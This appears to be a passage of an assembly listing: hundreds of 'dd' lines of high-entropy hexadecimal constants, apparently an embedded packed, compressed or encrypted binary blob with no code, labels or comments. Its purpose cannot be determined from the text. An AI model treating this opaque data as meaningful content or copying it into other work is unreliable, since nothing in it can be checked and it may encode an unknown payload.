dd 0BF4CBD8Bh, 0AEAB40FFh, 95B7AB01h, 0FF5B2197h, 2EDC5B2Eh
dd 0D85E2D5Eh, 32608AE3h, 50646872h, 1DFFAD43h, 6F6F85FFh
dd 0FE777170h, 7251FF10h, 5B197B9Ch, 8CADBDCBh, 4B82FFE8h
dd 85856B94h, 0D1FF8786h, 88AFEE04h, 0F18F794Ch, 0F307937Bh
dd 0F69E0E0Fh, 61B8DF15h, 21AFEBA5h, 0EF037EFFh, 37A94F24h
dd 0FDE7ABFFh, 4C8BEA22h, 34BAB05Ah, 0FFD6B75Dh, 0F834FEFEh
dd 0C1574299h, 0F3C3FFDFh, 0E3FAA248h, 0CA2291CCh, 0CFCEFF5Fh
dd 0F6FF955Fh, 4D63F2Fh, 0FE326598h, 36FC16D8h, 0B6CD0DCh
dd 39FAE40Eh, 0F58BBF5Ah, 3B26F988h, 16FC0CFFh, 8331BEFDh
dd 402FFEAh, 87D20605h, 0F78C2E4Dh, 9D866BFFh, 0D711307Fh
dd 1BD818E4h, 1FFFF72Ah, 22544211h, 0FF342257h, 1B2824CEh
dd 266B29C2h, 0FFFFA68Dh, 304611FDh, 38613441h, 3C768FFFh
dd 2A6A8B34h, 7B14FFB2h, 6226C35Ah, 8AFFC439h, 0BA3E0361h
dd 0FFA305C4h, 6303DA34h, 0DE5987D1h, 0FF5C58D2h, 0A195DFFFh
dd 42AC62B4h, 67658BCBh, 2EE6EBFFh, 6D19904Fh, 5E71FC1Ah
dd 1E7B7199h, 0CB61FF0Bh, 0B6DA76Dh, 81E975BFh, 63FF826Ah
dd 0CD7F8086h, 8F6777AEh, 51AFF543h, 0FF8C9267h, 0E1EE240h
dd 5A666CCCh, 33AB0E52h, 7DAD457Fh, 1BB25A91h, 0C2FFB6FFh
dd 0BF9EDD35h, 63BE4F7Dh, 83F22FFh, 0E5FECB3Ah, 0D9A9DA9Ah
dd 0FFB7D496h, 0FF1B60CFh, 30A3FF1Dh, 3C55B6DFh, 2FFFE30Bh
dd 91E692C3h, 8D023CE6h, 0FF0B1DE8h, 2F71E3D1h, 1E7F6333h
dd 0DA5746F5h, 0FCFAFF12h, 8D39FEFDh, 7FF2665h, 0A20907EFh
dd 0FE0A08E0h, 83200C0Bh, 2315346Bh, 9716FE0Eh, 0EFE73E5Dh
dd 225A0BFFh, 0B122FC59h, 0C327D5E4h, 8183F20Bh, 3570FF72h
dd 23FF63ABh, 72BD5D3Fh, 0FF3F60C7h, 47ADC9FFh, 0D9494847h
dd 6928C6FFh, 5E52A44Ah, 56B8FFBBh, 5BBCFF5Ah, 0AFCD174h
dd 5E295E2Ah, 0AEFF2F9Fh, 92DBA444h, 0FF765967h, 0C96E87B1h
dd 83B02154h, 67FF73A4h, 7D95FD1Fh, 80FCFD04h, 6C06E46Fh
dd 420ED8Bh, 81C5FFB3h, 8E0E307Bh, 0E93100Eh, 0FFA28D4Ah
dd 270DA6FFh, 0C6578EEDh, 44F7FF8Dh, 589CBEB2h, 1202BAB6h
dd 0BAB9B9FFh, 0DA30FABBh, 0C49BFEh, 0C42CC334h, 5EC8FF97h
dd 0E8AF47FCh, 0BFCE26C9h, 0B15945D2h, 33D3FFF2h, 1D6F39DBh
dd 34F8DE2Ah, 94A809E3h, 309FF1Bh, 5CBFEBF8h, 0FF5DEC04h
dd 5DBFD4F0h, 0F61EF1D0h, 3DF9B7F8h, 0DAC59971h, 0CF70BBFBh
dd 0C370FF23h, 0C7FF6E93h, 0AFFF112Bh, 0FDFEFFA0h, 0F29C0615h
dd 555F1C1Ah, 0F00645ADh, 5EE2A727h, 8926FF2Fh, 2D2DC6C3h
dd 0BCFDFDFFh, 0B8301756h, 0AF457356h, 0B0DEF80Eh, 97BE6504h
dd 11B171DDh, 0A0540EBFh, 7512F64Eh, 0FF23B6FFh, 1ED6FFDCh
dd 5CB6A07Fh, 89E0D848h, 0FF5F6363h, 4D0CEADCh, 72FF6E89h
dd 0BCE656F2h, 6A0CA152h, 93D2787Dh, 7FFF2F7Dh, 0E6E20C3Ch
dd 0E1E80A7h, 1C0E8190h, 0FF23D16Fh, 0DE16F4E3h, 0FFA060BFh
dd 63C8F7DFh, 9DFEF3EFh, 0A6E10CD9h, 3520D32Fh, 29FF2358h
dd 0FEC8373Ah, 0CCCEFC35h, 0C8C0B3BCh, 0E29FF4Eh, 8A42E3FFh
dd 0F1AF2CEBh, 11D5ACD1h, 0F915256Fh, 0FCD9FF31h, 9DDCA2B6h
dd 93FBB7E0h, 4CE794E7h, 4A0B72FFh, 0B77D753Fh, 0BF4109D0h
dd 8CF98F0Eh, 15FF86FDh, 96E1E9FCh, 1605F6C2h, 81CA3FFFh
dd 0FF0B2A69h, 131210F8h, 53997614h, 0F1E53CFFh, 97310719h
dd 0E0CCFF54h, 27CF23D7h, 0C0FF07EBh, 2C2B2A28h, 0C04BA3ACh
dd 0FF8F3514h, 0CB7DB7D9h, 9369C71Eh, 0A77B5BF1h, 0BFBF88C5h
dd 63DD4FC4h, 52FF50B8h, 0D9485453h, 0FFA57C13h, 5C275820h
dd 7B63B477h, 8F4F89FFh, 8347AB67h, 7553FF6Ah, 606C867Bh
dd 71FF9A34h, 9DA1A6B7h, 0FF0DAD75h, 7C017806h, 29839487h
dd 0B1A2C9D1h, 0FF2E8378h, 0A26F6E65h, 86B09364h, 0BF51FF57h
dd 52959B38h, 53B79F77h, 0FFFDA354h, 92A74FBAh, 0D3AAD034h
dd 4692AAFEh, 0E9FAA2ADh, 0C16FFF31h, 11479EFDh, 4D4F0EFFh
dd 0FF39E087h, 0BEC7C52Dh, 62C3C921h, 0D03A0FEDh, 0F41EFA01h
dd 0DFD7D73Dh, 0B856C5FFh, 34DAF9F9h, 7F0BAFE2h, 50653A02h
dd 0ABFFEBEDh, 0E0EC06ECh, 97F31984h, 0E0782CF3h, 0D006DDBCh
dd 14C8BF1Dh, 0E822CC02h, 7EE10689h, 0FEA0BECh, 0D8FF2D79h
dd 0C1FF94EBh, 3CA5BB16h, 8171FF1Dh, 5F282A5Ah, 5720503Dh
dd 0CF76F624h, 0FFFF2929h, 0B6AA297h, 0FF30DACCh, 35DEEF3Ch
dd 0D23E0BB0h, 0FFFF3A85h, 5CF7B3Eh, 44ACBF66h, 0FFFF468Dh
dd 682FC707h, 50BF8F49h, 0FF53B9DBh, 0DA0BF055h, 866D7D3Ch
dd 36E12F5Eh, 48FF88B0h, 364C97E8h, 0FE39696Fh, 792C627Ah
dd 0A5543F47h, 7500FF16h, 78769E53h, 79FF7A79h, 835A39F3h
dd 12828068h, 0A529D2FFh, 0F28DACFFh, 388CF588h, 91624EFAh
dd 36369179h, 98B117E8h, 0D173A106h, 609F9E7Fh, 0F087E62Eh
dd 0A7546458h, 44AFFF77h, 0AFAEFFACh, 0F73DB0B0h, 5DFF4990h
dd 518520B5h, 0F42728B8h
dd 0BEC3C1A6h, 0C72F476Fh, 0BC5DF07Dh, 0BF28BFCAh, 7616FF31h
dd 2AF190FFh, 0DBAEDBA1h, 7E21BCA3h, 216393D1h, 0FA54A5CAh
dd 17189360h, 0A0FF1116h, 0F70EFE37h, 0FF0D020Bh, 43EF21DAh
dd 0C4010137h, 0B01E9F0h, 44FF8C97h, 0DFFF5CE8h, 3FF1D33h
dd 3B33FF02h, 24D1E3FFh, 282727CDh, 0A68629FFh, 532A0948h
dd 334CFF33h, 36C5F5A0h, 3B2F39DFh, 5AE9B06Ah, 0A9FF441Bh
dd 4874E188h, 560E5FD0h, 7534C2F8h, 31172556h, 0B3FDF057h
dd 0CDA7555Bh, 0E94C5D06h, 0F62B00FFh, 6436FF64h, 8C268289h
dd 0F309919Ah, 0D1139A20h, 5D064729h, 0C361301h, 78195831h
dd 506293C4h, 431E5901h, 2EAF53DCh, 4417A2B7h, 0CFFD0007h
dd 4F7DB551h, 4811C7DBh, 1CD8AB8Fh, 600500F1h, 0DF06D52Ch
dd 0CB9AD08h, 0FB4000h, 0B80B0FBAh, 51FA7E16h, 0FABED0FFh
dd 0CBB3DE71h, 311F0801h, 0AB2B49AEh, 16D4E252h, 57DE855Ah
dd 8FED422h, 0F0EC21B0h, 9764F589h, 90229766h, 4F41810h
dd 0CD5D7BA2h, 2A23FCAh, 0F8844D16h, 410A074Fh, 7D37887Ah
dd 0F7038FE4h, 84F7C8Ch, 13765FDDh, 3B1C87h, 0FC1C5658h
dd 80E16015h, 6006AFDDh, 3CF2BD6h, 652ED4C0h, 62463DD0h
dd 4E038BCEh, 0F6FED4Eh, 6378BCA8h, 8402C05Fh, 0F85A357Bh
dd 904FA215h, 0BDA01CB5h, 6CC24D21h, 600F4E1Ah, 18810C6h
dd 3AC3B28h, 9FEDFE77h, 0C31283C5h, 9644517h, 0B44695C0h
dd 23121E0Ch, 0AF6D6B82h, 0F7E17033h, 0C94A9244h, 5344B0C3h
dd 0A02CB46Fh, 0EA7266BEh, 3716C10Ch, 408CB262h, 508ECA74h
dd 18E0224h, 8D9A961h, 4E2B3677h, 0CF21FF0Ch, 78761FC0h
dd 1BEFAFE8h, 66F44FB8h, 1BCE006Dh, 52EE1286h, 0E209F14Fh
dd 5F0C8B4Eh, 0D8DB5164h, 67D9FF69h, 0F7695126h, 27FD4E8Ah
dd 68516656h, 10232B23h, 8AA6576h, 38633EFh, 29674EDDh
dd 0CAF3F631h, 33096A8Ah, 7517B7F9h, 0F1F67C5h, 0B215D7B1h
dd 407C1F32h, 2F8AAAF5h, 0F9C56975h, 69E428FDh, 9E3A67E5h
dd 0C9167525h, 1F1FBF49h, 0EAF651BAh, 83329EE6h, 4FBBD03Eh
dd 6584DBD1h, 3B9A1B1Bh, 38D8123Eh, 4AC936CFh, 69DA077Fh
dd 7C67DBDBh, 12B75C08h, 0B7EF3A19h, 5370457h, 0FF5BAC6Ah
dd 17B0804h, 1B36EFADh, 2D267CFBh, 360940F6h, 782D4A42h
dd 0B20D8CB1h, 856421B3h, 0F709359Bh, 7FF05A27h, 4FBD9255h
dd 0B165645Eh, 69F67465h, 1F32A21Ch, 4D291436h, 0E23DFF78h
dd 7167E369h, 6EAB216Eh, 8962395Eh, 1C9EDBFBh, 0F416518h
dd 6CB6C281h, 0C96C1066h, 9199F679h, 7968360Dh, 993584Dh
dd 0F73267A8h, 0B30DDBB1h, 7ED82F02h, 0CBCF0D64h, 4F84F7DBh
dd 7031DB39h, 0DFAE6840h, 5B996AB5h, 0DF853259h, 2868E8F8h
dd 0FABE375Ch, 0E8E0C3FFh, 2BCD77D0h, 0E8E005C0h, 0F88D2136h
dd 0A8570D98h, 58CDA7C7h, 36A176Fh, 0DD086F59h, 8FDD0148h
dd 0E3411BB8h, 78ABF3AFh, 0B8EC0FBDh, 0AB4AD855h, 0BEFA2E5Fh
dd 0EAC33091h, 61DBD309h, 891C0630h, 89BADF20h, 0B9F7C200h
dd 7A2A58F0h, 914046D0h, 65851662h, 0FFFFAEEAh, 856FB255h
dd 0FCAFAAACh, 0AFBDADBAh, 6405FFB2h, 8DFE4499h, 4CF295h
dd 47300A00h, 0DBB9FBA0h, 870A610Bh, 118E4428h, 1B0E741Fh
dd 0F6E0C3Ch, 9A14B016h, 0BC26C39Fh, 0FA08EC33h, 127804BEh
dd 8D6E6C04h, 0B236E7F8h, 11524982h, 1B039BDEh, 24C9D14Dh
dd 0D98894B3h, 331102E8h, 0D02BE017h, 32A301F8h, 991EDB4Bh
dd 0DD874D88h, 2B024910h, 12D90ED2h, 0CF1860BCh, 0B7B79F9Ah
dd 0FF9804A2h, 881375B1h, 50D8C1B0h, 0CBD4D0BCh, 0DB61143Fh
dd 35216170h, 3788EF87h, 8790542Ch, 5F05520Ah, 56C5028Ah
dd 0BE3E3FB0h, 22635029h, 1CE225CDh, 242D21AAh, 8C34FF08h
dd 122DE49h, 60880395h, 70BD0304h, 83128CD2h, 81726145h
dd 0DAC37F91h, 990E01EAh, 5BBDB52h, 35C5E79Dh, 0CE0E37FFh
dd 8AF65659h, 80F237Bh, 170E99EDh, 580269EDh, 49DEFB08h
dd 1BB78E00h, 0F2AE40BEh, 29EFAEAAh, 54B7BAh, 5EAA0D6Eh
dd 90F10AEDh, 9C230F7h, 0FE63837Bh, 881C062Fh, 88ECDF1Fh
dd 0BBF694FFh, 8E6358EFh, 0E757FFFFh, 0FEFEAA11h, 0D0A2FEA2h
dd 0B5AAB0A2h, 7BB68DBBh, 557D0325h, 0BFF0C0AFh, 28BD026Dh
dd 4C77E74Fh, 0ED8ECCFFh, 15FB2343h, 1B3CCCBBh, 0B11163A9h
dd 8B0EE425h, 3B67B64h, 5F9211B1h, 38A97A52h, 82FC1258h
dd 323638Ch, 0FFF1C0FFh, 12F6948Ch, 2DFFFF50h, 1A9F4D4Dh
dd 1275E70Eh, 0E900EC86h, 0F7096412h, 5B16F57Fh, 76A803EDh
dd 0C61DF7C2h, 5AF6EE19h, 23173709h, 1C9209B1h, 7D370F6Ch
dd 34D81702h, 9B290E8Dh, 0D58B287h, 0FB1C98DEh, 0FB7A7C63h
dd 1206B967h, 0DD8D586Eh, 4AEFF6C0h, 4B7F246h, 0B3B7B6D9h
dd 752ED919h, 308D1B73h, 793EFF0Ah, 4007A02h, 67F80E63h
dd 0A2670E4Dh, 774D7F26h, 0DF4B7802h, 7402F673h, 36136900h
dd 6B5FF7FDh, 867704Eh, 0EC9ED849h, 0BBC21Bh, 10432F1Fh
dd 0F62DFE84h, 36191AA7h, 194DD2C7h, 9F7F23E1h, 7DE26C51h
dd 0ED577E02h, 1B7CD804h, 0D25E9C2h, 0B203BBA3h, 0BE19113Fh
dd 64D43506h, 216D1C28h, 0CD61EF8h, 0FF361AD9h, 93DC4D52h
dd 483D0009h, 0FFB80A8Dh, 7C027B39h, 3A6F5200h, 7F77CA9Bh
dd 0F3C0DEE2h, 0B1F2910Dh, 50841F18h, 0DA5F846h, 0BBE8416Eh
dd 0C0A90321h, 0EE28F486h, 0BF8E20Ah, 63808067h, 0C908EFAEh
dd 0FFF2C0F6h, 0EA8B3313h, 1EDB840Eh, 65B0E4FEh, 47039E2Bh
dd 1E9AED65h, 99208C74h, 26DD4520h, 3F0FDE03h, 0D31663A3h
dd 5B1F427h, 0B5C4B20Dh, 0F6E4D36Ch, 7A49E3E0h, 1370DCABh
dd 93D7119Dh, 3C670C24h, 5128D861h, 8634C20Eh, 66EDD81Bh
dd 627CFB34h, 9EF5C0ECh, 0C34ED63Bh, 1662DB54h, 8D78DBBAh
dd 26870B24h, 0CED876Ch, 0B82E7BBEh, 4E1412D8h, 5EC904B0h
dd 46B27FB0h, 87FF70AEh, 47CDCF8h, 0C21535A5h, 61CE178Ch
dd 5FD1DF5Eh, 0EC1408C4h, 0B71AFFEFh, 7E22C22Dh, 831B095Bh
dd 0C60B0E33h, 0ECCF770Eh, 9C6F138Bh, 6A9F22A2h, 93391704h
dd 28F3A4C0h, 6F4911B8h, 8C910EFFh, 3EFD8BFBh, 6DFBFF13h
dd 0E3D16DAh, 0FCED13FEh, 0ED0BDF41h, 8BAFF8Bh, 3DE31DFh
dd 0FE7E0D16h, 9A7133FBh, 1909FADAh, 0EF17DB6Bh, 0D81F9FB3h
dd 0D9158D55h, 243F1F32h, 2DABA6Fh, 6B9F406Fh, 0FB80FB3Ch
dd 252AFD7Fh, 49FB6B31h, 1FC54526h, 0D31611BDh, 1205DD3Eh
dd 13CEC816h, 0A7D6FD73h, 0EEDA8273h, 811608BBh, 0FB947B17h
dd 17E08A5h, 466FFD96h, 0EE6F1BE1h, 774F530Bh, 0A9463529h
dd 0DD533E75h, 6D7EEF76h, 93B30F7h, 0F9A0861h, 75DF0658h
dd 75FB5F64h, 0E0717FEh, 6F9ABE58h, 0EB16A6FEh, 0BECFFE3Bh
dd 0FD83FB84h, 1E79C66Ah, 0D3DA3FEh, 8E02EFFEh, 0BAFD8DFBh
dd 0FB14314Dh, 1B1DCF08h, 883EB7F8h, 0EC60D54h, 0EDE6C1A7h
dd 9E0C3DD4h, 6F26FBABh, 92B129BEh, 6D28901Ah, 62EC1703h
dd 6F1230AAh, 0B4763C60h, 0E7FFC125h, 82FE0A3Dh, 0FD81FBF6h
dd 6361A5Dh, 0E30A3775h, 49F3D61h, 0B141B726h, 0CF9C0D34h
dd 17CF5C26h, 0D634BE5h, 5692670Eh, 7C4C24DFh, 324F0F4Eh
dd 0BEB10E6Fh, 0B3DDDDDh, 5F6EF4Eh, 24FCC015h, 0D29F29B1h
dd 0FE84083Dh, 21FB7B6Dh, 0FB7D8683h, 0BB3AB5B2h, 882110Dh
dd 0B6003C76h, 0A2938970h, 0D86F6405h, 24368748h, 0CFEBF626h
dd 15F704CCh, 5D0D9A8Dh
dd 8D50328h, 197A6FFEh, 30D97707h, 15362BFBh, 2E9B7943h
dd 5D1DDFB8h, 630F3E1Eh, 8237B49h, 0BA0498EFh, 0EB984276h
dd 1B35DF03h, 0F3D665Ah, 0C623EF97h, 0B2168AB1h, 0C76C9151h
dd 3177FBE9h, 0A283DA17h, 0D1EFCABEh, 0D67E2E90h, 16E48D71h
dd 15FFF829h, 26FDFB51h, 899318EFh, 0D93C6499h, 59B35DD1h
dd 93D28EEh, 0A418C627h, 5B753FC9h, 0D889FB8Ah, 0DE2596FDh
dd 0ADFB2FB5h, 0FBFD1A88h, 0BB528FE5h, 1AE2B61Fh, 0D40221Bh
dd 538916A2h, 0EC2BFC5Fh, 0E19F153Eh, 0E929867Bh, 49C41822h
dd 0CF878432h, 2B0F8B11h, 6C15FBACh, 1196422Ch, 9A035EDBh
dd 0AA0790BAh, 9D8903DDh, 8C861D8Dh, 9E270E33h, 0FD37DCFCh
dd 0FC563F0Ah, 0EF9AFD72h, 0FEFAC57Ah, 3DF1782h, 0FD85FB86h
dd 0BBFE2DB9h, 38B0E40Bh, 6AC74318h, 7EF043FBh, 9D083D67h
dd 0F6937CE9h, 0D9926427h, 0E47A7C85h, 6FB64254h, 0DE4F1980h
dd 0E05A7D16h, 0FC1117E1h, 0EDBAFEBFh, 13C522Eh, 79915715h
dd 15DB1653h, 0FF5B755Ch, 515B2D5Bh, 57554644h, 488543B6h
dd 0B5F6034Ah, 76007B15h, 0E9D7EF1Eh, 0BAAD5B03h, 0A12AEF68h
dd 0FC8C1F95h, 45C03BF8h, 2673561Bh, 1FFA9370h, 62D25529h
dd 1C6C118Ch, 84473D9Ah, 5949FE0Eh, 1DFD426Fh, 0FD87FB88h
dd 0CE138D36h, 157D2AFEh, 0CF3A18F3h, 0EF7FC7FBh, 0CA037542h
dd 0CFA34CBDh, 0E608BB65h, 0BB0DBBEFh, 14D86603h, 0B0FD667Bh
dd 862AD1Dh, 380639ECh, 0F1F96C3Fh, 174FFD98h, 0A43F0Ah
dd 5D2BB70Bh, 631E0327h, 58270C11h, 0FEC907B0h, 79EFB596h
dd 0F8A4F41Bh, 61E7CD59h, 51DDDC29h, 8A7DB24Dh, 0B7B29D0Dh
dd 0B7B34582h, 5AB3858Ch, 3D4F982Dh, 148D2A40h, 0AC676009h
dd 3313166Ah, 0B3F3A7B3h, 0A3FABA93h, 0FE191537h, 0E90997CAh
dd 4BEDD445h, 0D40B592h, 263E3ECCh, 0BBC11F03h, 0CA2B6363h
dd 0F470EE08h, 96C72CF5h, 931DCD97h, 137A96E2h, 0EFD0A7F0h
dd 0DF30DBEFh, 19E00CF6h, 130C35C6h, 2C80BC33h, 3DA7347Ch
dd 0CDBF1D54h, 3D901E4Fh, 361B670Ah, 56111738h, 150A68A5h
dd 0A23830FCh, 0EBD52047h, 0B30501A0h, 3D365DDh, 51DF34FAh
dd 660F8E63h, 133A2806h, 48401B1h, 38B26051h, 0C2A2A10Fh
dd 898262BEh, 229F1D18h, 57A32581h, 3B29485Ch, 3FD80936h
dd 80831859h, 61916507h, 8A0F2D47h, 6CFB2CEEh, 0D89D4747h
dd 0D91D8079h, 5E7B0BA7h, 10F9446h, 0B17165D8h, 9090FF34h
dd 0A9DB3D37h, 2AFF3B01h, 891165BBh, 0FFF51B83h, 52CF6EA4h
dd 0B2B9ECD1h, 0AF8E66FFh, 3F3A7CAh, 0D8006F01h, 0CBFF6F8Fh
dd 82A46CD8h, 0FFEC1936h, 0F9CD0C6Dh, 0A85AD715h, 0B61812FFh
dd 4828978h, 0B8DCFF26h, 5023ABC9h, 0ABFFC6F5h, 7883F316h
dd 0FF9E1541h, 4E19DD86h, 6A523C67h, 0B5B601FFh, 0D012E592h
dd 110DFF92h, 102E921h, 0A7FF0B02h, 7C55261h, 0FF7AB9ADh
dd 6ECC2E6Bh, 42F4D6A3h, 291593FFh, 1063BEAh, 3CD2FE6Ah
dd 4FA8A937h, 0F1E60D3Ch, 389F2A65h, 56DFCDA2h, 7A2CC04Eh
dd 6D3CEBFFh, 0EB52C6BEh, 0D4EEFFA2h, 45914DA7h, 0ECFFFD25h
dd 0BFC7D804h, 0DB236EF0h, 5130B71Dh, 7FCF70A9h, 9F6952F9h
dd 77FF4115h, 0CD459512h, 0FF5227D7h, 0FDBA1C30h, 8ECA9D1h
dd 2C5579FFh, 36FC1917h, 6B2AFFD6h, 45F9D754h, 0EEA331DAh
dd 7F016DCCh, 0C221CFFFh, 0BBD01F2h, 0EED6FFB7h, 0C244058Ch
dd 0CE466CECh, 0BD2D56FFh, 1686BB1Fh, 3E9B3F6Fh, 0FF0DFF8Eh
dd 5EAA3A40h, 0DDFD27F8h, 9CEE43B2h, 2FBFBF77h, 2EF9B20Eh
dd 515553E5h, 47C419FFh, 9A95EAC5h, 0F6C3ED0Bh, 0B3ED7E01h
dd 0C87FB916h, 89CFFFB0h, 0E2A0FF6Ch, 6903861h, 58FFAC7Dh
dd 0AA93A83Dh, 0FDC65C1Ch, 76EE5FACh, 0FFBF425Fh, 6E64E281h
dd 0BB50FF8Fh, 35B7E9AAh, 0BDFFA103h, 62F0B61h, 0FF780477h
dd 0AA89D402h, 0EE66EF53h, 218337FFh, 5354412Bh, 4ED5FF2Bh
dd 0A5A26D81h, 7EF99F9Bh, 5FDC2204h, 3FD89419h, 8E62D2FFh
dd 6DC7588Fh, 41B778ECh, 8F837EFFh, 0DF052565h, 0BFBB9780h
dd 2644FFF1h, 4604A1D5h, 2CFFE82Ah, 8339D51Eh, 0C229356Bh
dd 0FF3F9B78h, 73A068BBh, 853F69ACh, 10D17F3Ch, 71A9B698h
dd 506CFF3Fh, 56564DE4h, 0EC8AFF1Eh, 1F2302B8h, 0A8F853F1h
dd 1F4C3AEh, 7FDF8050h, 27057BE1h, 3A1FE39h, 6C3CC979h
dd 3D7FDF2Ah, 0FF65592Dh, 7C091573h, 52AEEBAAh, 0D3A91BEDh
dd 0D3B8FFFFh, 887F9EF1h, 82FF867Ah, 0C62AD54Eh, 0FF8E95E3h
dd 0C038A1FDh, 0A8BC613Ch, 0FFBC0B85h, 264590B2h, 0FDD69207h
dd 0C5BFA5B7h, 5355C2B8h, 5BFF8569h, 18FF89D5h, 5965A222h
dd 0FDEAABECh, 1BABC1D1h, 7FBFFA50h, 7A86D476h, 0E6C5F6FAh
dd 0FF3F4F69h, 0CEDE0D6Bh, 0FF20BA25h, 0BF0E6E05h, 793E40A9h
dd 27A04FBh, 7EFFF697h, 36EBE2DEh, 7E3F17B6h, 4ECFEDE1h
dd 0ADC8BFD9h, 6ADDFF1Eh, 18A47380h, 0DCADFF52h, 7809EC7Bh
dd 0FC999Eh, 0BD3F67A0h, 51BF2F2Bh, 1AEF8E12h, 0DDBF0759h
dd 253E7A7Dh, 240E7EFEh, 30B1CD5h, 239F7F11h, 8CFFA1F7h
dd 9194942h, 0FFA0AA80h, 0C8755127h, 91DB2C10h, 9B0602FDh
dd 1BA21077h, 4DFF5218h, 7455E42Dh, 0BB60252h, 7BFB5A7Fh
dd 0EA0FCB38h, 86005BC0h, 0F80B98FFh, 0AC0617F2h, 520DFFB7h
dd 2A6B5452h, 0E5FFDB4Dh, 792C19C2h, 0EBEC1A27h, 1A5F7EACh
dd 152BAB7Fh, 0FBF56A6Fh, 0E798606h, 7D1FFF35h, 0FF8EB5E1h
dd 3257705h, 39E3F08Ch, 7D4796C2h, 251003FFh, 0EA1A9F6h
dd 0FF023F1Bh, 0D06D7FD6h, 0C8EB0E55h, 427F4E8Ch, 0CD65F6F9h
dd 0B7E97FDFh, 0C2193F20h, 0C98418FFh, 0FFDD3AD6h, 856BC457h
dd 731237A1h, 0AFD7D9F8h, 0FEE16752h, 3666FFBFh, 0FE9D1218h
dd 9C7338EEh, 0DF5539DDh, 10FFD57Fh, 3D39FFE2h, 5159D62h
dd 4BC6DD94h, 0A4E13F06h, 295A3FBDh, 40223F17h, 0A1AA68B7h
dd 636DFF15h, 2904DCE6h, 7F6FC136h, 0FCF67549h, 49B1BA05h
dd 0BF2803E9h, 672E0ADFh, 0BF18BA59h, 8A0A2CFFh, 428EA1F9h
dd 0FF860CDBh, 241CF199h, 3FBFA850h, 250D6869h, 50BF6E0Ah
dd 1F9F461Eh, 0FE3826BFh, 0BFC0A274h, 1529E8AAh, 0F3B35BA4h
dd 0D4A8F3FFh, 0C2ABA1EEh, 0DB25A51Ah, 2BEA57FFh, 1784C647h
dd 0F365FF16h, 0D702839Eh, 118FD0EAh, 9A9CFFBFh, 229DF101h
dd 0A1F40086h, 0F1B6DD1Dh, 0BF8C18FFh, 64BFEC15h, 4A3778F3h
dd 403F46FBh, 5FBF8C70h, 50907F7Fh, 0FEFF6F3Ch, 9BDBDF95h
dd 81E93F3Dh, 6E7F2D54h, 7B938E9Fh, 0B4B08DB9h, 0B6D6D9FFh
dd 804EDDFh, 0ED16FC7Ah, 537190Eh, 0FFBF3F3Bh, 51C0EC6Dh
dd 0BF1995E6h, 0FFFF36C3h, 0A54B5193h, 0F8D30394h, 0AE4362BBh
dd 0C9BFDCD7h, 0B971FF47h, 0B2004A6h, 0AFD8B93Fh, 0DACF7F10h
dd 3138F07Dh, 3F8F5A02h, 0FF020EAFh, 9E624539h, 0C6C3D8B6h
dd 0D3E3FF0h, 57F8D7Bh, 3F86BF61h, 7EFF5184h, 0CB187DBAh
dd 5044607h, 0EAF8FEB3h, 0ADF6D3A0h, 25BFC601h, 9B6D027Fh
dd 0A9F5FFC7h, 3F5E3EC6h, 0F9F85293h, 7E9C6EBh, 57413FDFh
dd 72DBC52Dh, 0FA213FD1h, 83035571h, 277F4655h, 657F8F70h
dd 59D64730h, 0D9FEFFB2h, 0CBEBD6C8h, 0F3FF974Eh, 81BF0B1Fh
dd 0DC917CFEh, 2EA84F3Ch, 0FFD60DA5h, 0C6857FA5h, 0FE6B7F5Bh
dd 2AC60FA1h, 0B79154D3h, 0F885093Fh, 0CB53A4EEh, 0FF3F11C7h
dd 0CB4F918Eh, 12A3D9D0h, 0FC7FFFA5h, 6D3F7137h, 0FF6E0EC3h
dd 7F373292h, 71F92668h
dd 0CE3D4CACh, 0E9E06178h, 0E2A4BFCFh, 4F4AA5FEh, 4155E62Dh
dd 3C02BFC6h, 0B13F2FBFh, 962F1BD8h, 89E9C139h, 7F3F3504h
dd 8F98E069h, 50FFC026h, 4300BE4Eh, 0FFEE9B86h, 3CDBA902h
dd 73EC3768h, 0AAC338F6h, 79FF3F01h, 7DC259D0h, 1BC096E0h
dd 9B7F8F6Bh, 12810590h, 0FE0C6EB8h, 4690E9FFh, 0E395A32Fh
dd 2F4E6FA1h, 3F083B02h, 855F59CFh, 7B5B7F9Ch, 0CCB3FBC9h
dd 63E3AACh, 9BF8C27Ah, 754F7FC6h, 0A61023BAh, 9995BF7Fh
dd 0FD1BED0Bh, 863A5B83h, 0BFBCA8DDh, 337F5B09h, 7F3CBCC6h
dd 0FF85E4EDh, 36356DFCh, 3F41079Fh, 521A643Fh, 1ADCAFFFh
dd 781A097Fh, 9FFDE344h, 0A87E7F81h, 667598FAh, 3AF83F31h
dd 0FE2FEB63h, 76407EDFh, 0FFE0DEDh, 7A4D978h, 0FF17E630h
dd 0FF58C260h, 0DB9707CEh, 87ACDC1Eh, 9B4A64FFh, 12FA7F7Dh
dd 3F5C015Ah, 0FF2FEC90h, 2390A8ADh, 0FF3F495Ah, 12CA8251h
dd 0C0946B4Ah, 7FE3A9D9h, 7F7BEDBFh, 7FC81CC6h, 0FF93123Fh
dd 93F8459Bh, 324F00A1h, 3F8CBF70h, 212C9F24h, 0A9EB2FD5h
dd 8C7F1BE2h, 7F8CBC9Dh, 767F089Ch, 0AF3F7FBCh, 972A4538h
dd 9444F5E3h, 0C80F78B9h, 607FDF2Ah, 84A6C271h, 2967FF35h
dd 0BF3C2FCh, 23EECB68h, 0DEFFBA7Fh, 962E8FB8h, 0D35F8144h
dd 7EBF4109h, 0F9DE9498h, 7FC6C55Fh, 0E0FF3143h, 0D46E4EA0h
dd 3979B8BFh, 357F5F6Bh, 0C2522E1Fh, 32FFABF8h, 8BA43C78h
dd 608B1BA9h, 0CBFF5185h, 8C19B308h, 2F64FF90h, 38ED0819h
dd 0C786F7BAh, 607FD552h, 0BF7428CBh, 0D6BCFFBBh, 9C87183Fh
dd 0E57F347Fh, 0F66128A3h, 7F6BAB7Fh, 521FBE19h, 0C6CF66E5h
dd 0FFFFDC24h, 0A5044D06h, 0FFF1A239h, 0CC2B4651h, 0A379533Fh
dd 0A6D03F0Bh, 0EFFF7FC1h, 2740474h, 1B0CEA9Ah, 0BAF8EEBFh
dd 0FDDA7992h, 0F7C1BF17h, 82D815F8h, 3FDFEFBAh, 3F1BB44h
dd 25F4B8F7h, 0FD71FF9Ah, 0FF8CA9CCh, 6E9CFB03h, 5EF06284h
dd 54F1FCFFh, 2B743FDCh, 1B60FF34h, 9C971A7Fh, 4B83C11Fh
dd 0BF6BAD3Fh, 0E3F5F7C1h, 0D070BF7Fh, 0A8FF2E9Ch, 843F115Ch
